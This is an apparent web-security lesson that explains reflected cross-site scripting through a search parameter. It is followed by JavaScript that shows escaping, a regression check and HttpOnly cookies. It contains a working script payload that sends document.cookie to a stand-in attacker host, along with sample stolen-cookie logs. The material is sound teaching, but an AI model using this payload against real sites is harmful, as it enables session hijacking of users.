Reflected XSS
Mal is a hacker who has noticed that your site's search function passes search terms in the URL.
He knows the search terms in the URL will get displayed back on the search results page, and he wonders if they are escaped properly.
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
Sure enough, when he drops the URL in his browser, the injected JavaScript is executed and the browser redirects to his malicious site.
Mal can now check his server log and hijack Vic's session, since the malicious redirect passed Vic's session ID in the URL.
Let's look in my big book of hacks.
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
All your sessions are belong to us.
The indifferent restaurant review site
I guess you should search for food or something.
Server Logs
http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE
http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl
http://www.haxxed.com?cookie=SneklfjsdkleekflaAne
http://www.haxxed.com?cookie=asFFEfn222fefeknladf
Webpage HTML
<div class="search-terms">
  Search results for "<script>
    window.location="http://www.haxxed.com?cookie="+document.cookie
  </script>"
</div>

<h6>No results found</h6>
The indifferent restaurant review site

Search results for ""

This seems relevant to my interests.
Where's this taco then?
I am not having a good day.
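
The missing escaping step on the search results page, shown beside a hardened version. This is an added example, not code from the original lesson; the function names, the cookie name "session" and the HttpOnly cookie header are assumptions for illustration, and the template mirrors the Webpage HTML above.

```javascript
// Search term taken from the URL shown in the lesson; used only as test input.
const LESSON_TERM =
  '<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>';

// Escape the five characters that are significant in HTML text and
// in quoted attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the term is pasted into the markup as-is, as on the lesson's page.
function renderSearchUnsafe(term) {
  return `<div class="search-terms">\n  Search results for "${term}"\n</div>`;
}

// Hardened: the term is escaped for the HTML context it lands in.
function renderSearchSafe(term) {
  return `<div class="search-terms">\n  Search results for "${escapeHtml(term)}"\n</div>`;
}

// Regression check: a renderer must emit the same number of tags whatever
// the term is. Extra "<" characters mean the term became markup.
function termBecomesMarkup(render, term) {
  const count = (html) => (html.match(/</g) || []).length;
  return count(render(term)) !== count(render(''));
}

// Defence in depth: HttpOnly keeps the session cookie out of document.cookie,
// so a script that does run cannot read it. Cookie name is an assumption.
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

console.log(renderSearchUnsafe(LESSON_TERM));
console.log(renderSearchSafe(LESSON_TERM));
console.log('unsafe renderer lets term become markup:', termBecomesMarkup(renderSearchUnsafe, LESSON_TERM));
console.log('safe renderer lets term become markup:', termBecomesMarkup(renderSearchSafe, LESSON_TERM));
console.log(sessionCookieHeader('constructed-session-id'));
```

The tag-count check works as a unit test for any template that echoes user input, because it fails as soon as a new code path forgets to escape.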